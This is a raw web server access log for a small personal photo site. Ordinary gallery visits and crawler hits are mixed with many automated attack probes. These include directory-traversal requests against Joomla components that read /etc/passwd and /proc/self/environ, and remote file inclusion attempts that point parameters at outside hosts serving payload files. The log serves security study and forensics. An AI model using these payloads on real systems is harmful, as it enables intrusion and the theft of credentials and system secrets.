63.194.250.181 - - [26/Jun/2010:23:59:03 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:29 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:29 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:29 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:29 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:29 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:29 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:29 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:29 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:30 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:30 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:30 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:55 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:55 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:56 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
63.194.250.181 - - [26/Jun/2010:23:59:56 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 (.NET CLR 3.5.30729)"
86.109.111.120 - - [27/Jun/2010:00:01:00 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
86.109.111.120 - - [27/Jun/2010:00:01:00 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
86.109.111.120 - - [27/Jun/2010:00:01:00 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
86.109.111.120 - - [27/Jun/2010:00:01:00 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.833"
86.109.111.120 - - [27/Jun/2010:00:01:01 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.833"
86.109.111.120 - - [27/Jun/2010:00:01:01 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.833"
67.195.112.180 - - [27/Jun/2010:00:02:20 -0500] "GET /logs/access_log.1227484800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.206.204.16 - - [27/Jun/2010:00:03:26 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.206.204.16 - - [27/Jun/2010:00:03:26 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.206.204.16 - - [27/Jun/2010:00:03:27 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:04:01 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:04:09 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:04:09 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:04:09 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:04:59 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:04:59 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:04:59 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:05:12 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:05:12 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:05:12 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:05:45 -0500] "GET /logs/access_log.1274572800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:05:45 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:05:45 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.206.204.16 - - [27/Jun/2010:00:06:34 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.206.204.16 - - [27/Jun/2010:00:06:35 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.206.204.16 - - [27/Jun/2010:00:06:35 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:07:21 -0500] "GET /logs/access_log.1276819200/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:07:41 -0500] "GET /logs/access_log.1276819200/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:07:49 -0500] "GET /logs/access_log.1276819200/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
67.59.156.163 - - [27/Jun/2010:00:08:00 -0500] "GET /logs/access_log.1276819200/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.55.41.132 - - [27/Jun/2010:00:10:07 -0500] "GET /logs/access_log.1274832000/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.41.132 - - [27/Jun/2010:00:10:08 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.41.132 - - [27/Jun/2010:00:10:08 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
207.46.199.201 - - [27/Jun/2010:00:10:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.236.50.166 - - [27/Jun/2010:00:10:25 -0500] "GET /index.php?option=com_webeecomment&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
208.53.147.51 - - [27/Jun/2010:00:10:36 -0500] "GET /index.php?option=com_webeecomment&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
195.56.55.217 - - [27/Jun/2010:00:10:59 -0500] "GET /logs/access_log.1266710400//?path%5Bdocroot%5D=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
195.56.55.217 - - [27/Jun/2010:00:11:00 -0500] "GET //?path%5Bdocroot%5D=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
195.56.55.217 - - [27/Jun/2010:00:11:00 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt? HTTP/1.1" 200 11111 "-""libwww-perl/5.805"
74.55.41.132 - - [27/Jun/2010:00:11:03 -0500] "GET /logs/access_log.1276214400/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.41.132 - - [27/Jun/2010:00:11:59 -0500] "GET /logs/access_log.1275782400/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.55.41.132 - - [27/Jun/2010:00:12:00 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.55.41.132 - - [27/Jun/2010:00:12:00 -0500] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
87.206.204.16 - - [27/Jun/2010:00:12:09 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.206.204.16 - - [27/Jun/2010:00:12:30 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
208.53.147.51 - - [27/Jun/2010:00:13:23 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
208.53.147.51 - - [27/Jun/2010:00:13:23 -0500] "GET /index.php?option=com_webeecomment&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
208.53.147.51 - - [27/Jun/2010:00:13:23 -0500] "GET /logs/index.php?option=com_webeecomment&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [27/Jun/2010:00:13:34 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [27/Jun/2010:00:13:35 -0500] "GET /index.php?option=com_webeecomment&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [27/Jun/2010:00:13:35 -0500] "GET /logs/index.php?option=com_webeecomment&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
85.236.50.166 - - [27/Jun/2010:00:14:46 -0500] "GET /logs/access_log.1274572800/index.php?option=com_webeecomment&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
208.53.147.51 - - [27/Jun/2010:00:14:51 -0500] "GET /logs/access_log.1274572800/index.php?option=com_webeecomment&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
174.142.75.205 - - [27/Jun/2010:00:18:52 -0500] "GET /logs/access_log.1276473600/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
174.142.75.205 - - [27/Jun/2010:00:18:52 -0500] "GET /images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
174.142.75.205 - - [27/Jun/2010:00:18:52 -0500] "GET /logs/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
207.46.13.50 - - [27/Jun/2010:00:20:41 -0500] "GET /logs/access_log.1244764800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.206.204.16 - - [27/Jun/2010:00:22:14 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.120.159.137 - - [27/Jun/2010:00:22:19 -0500] "GET /logs/access_log.1276128000//linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.831"
174.120.159.137 - - [27/Jun/2010:00:22:19 -0500] "GET //linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.831"
174.120.159.137 - - [27/Jun/2010:00:22:20 -0500] "GET /logs//linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 303 "-""libwww-perl/5.831"
188.40.246.135 - - [27/Jun/2010:00:23:17 -0500] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 299 "-""Advanced Browser (http://www.avantbrowser.com)"
188.40.246.135 - - [27/Jun/2010:00:23:17 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 294 "-""Advanced Browser (http://www.avantbrowser.com)"
203.64.143.165 - - [27/Jun/2010:00:23:58 -0500] "GET /logs/access_log.1276128000//linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
203.64.143.165 - - [27/Jun/2010:00:23:59 -0500] "GET //linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
203.64.143.165 - - [27/Jun/2010:00:23:59 -0500] "GET /logs//linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
174.120.159.137 - - [27/Jun/2010:00:25:55 -0500] "GET /logs/access_log.1276819200//linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.831"
201.20.37.59 - - [27/Jun/2010:00:26:18 -0500] "GET /logs/access_log.1266710400/phphtml.php?htmlclass_path=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
201.20.37.59 - - [27/Jun/2010:00:26:19 -0500] "GET /phphtml.php?htmlclass_path=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
201.20.37.59 - - [27/Jun/2010:00:26:19 -0500] "GET /logs/phphtml.php?htmlclass_path=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
200.103.187.57 - - [27/Jun/2010:00:26:25 -0500] "GET /phphtml.php?htmlclass_path=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.825"
203.64.143.165 - - [27/Jun/2010:00:27:05 -0500] "GET /logs/access_log.1266710400/phphtml.php?htmlclass_path=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
203.64.143.165 - - [27/Jun/2010:00:27:05 -0500] "GET /phphtml.php?htmlclass_path=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
203.64.143.165 - - [27/Jun/2010:00:27:06 -0500] "GET /logs/phphtml.php?htmlclass_path=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
203.64.143.165 - - [27/Jun/2010:00:30:30 -0500] "GET /logs/access_log.1276819200//linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
188.40.246.135 - - [27/Jun/2010:00:31:23 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
188.40.246.135 - - [27/Jun/2010:00:31:23 -0500] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
67.195.112.180 - - [27/Jun/2010:00:35:31 -0500] "GET /logs/access_log.1217894400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.103.187.57 - - [27/Jun/2010:00:37:06 -0500] "GET //linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
66.249.71.144 - - [27/Jun/2010:00:38:49 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Googlebot-Image/1.0"
66.249.71.144 - - [27/Jun/2010:00:38:49 -0500] "GET /costume/costume99%20copy.JPG HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
77.222.56.62 - - [27/Jun/2010:00:39:09 -0500] "GET /logs/access_log.1274054400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.222.56.62 - - [27/Jun/2010:00:39:09 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.222.56.62 - - [27/Jun/2010:00:39:09 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.195.112.180 - - [27/Jun/2010:00:44:13 -0500] "GET /?M=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.252.241 - - [27/Jun/2010:00:53:24 -0500] "GET /logs/access_log.1211932800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.203.180.144 - - [27/Jun/2010:00:54:06 -0500] "GET /logs/access_log.1274054400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
211.203.180.144 - - [27/Jun/2010:00:54:07 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.203.180.144 - - [27/Jun/2010:00:54:07 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
72.51.33.26 - - [27/Jun/2010:00:56:01 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
201.20.37.59 - - [27/Jun/2010:00:56:08 -0500] "GET /logs/access_log.1276128000//linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
201.20.37.59 - - [27/Jun/2010:00:56:09 -0500] "GET //linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
201.20.37.59 - - [27/Jun/2010:00:56:09 -0500] "GET /logs//linkadmin.php?page=http://plautdietsch.net/myid.jpg? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
99.188.49.167 - - [27/Jun/2010:00:58:34 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:00:58:34 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:00:58:34 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:00:58:34 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:00:58:34 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:00:58:34 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:00:58:34 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:00:58:34 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
99.188.49.167 - - [27/Jun/2010:00:58:34 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)"
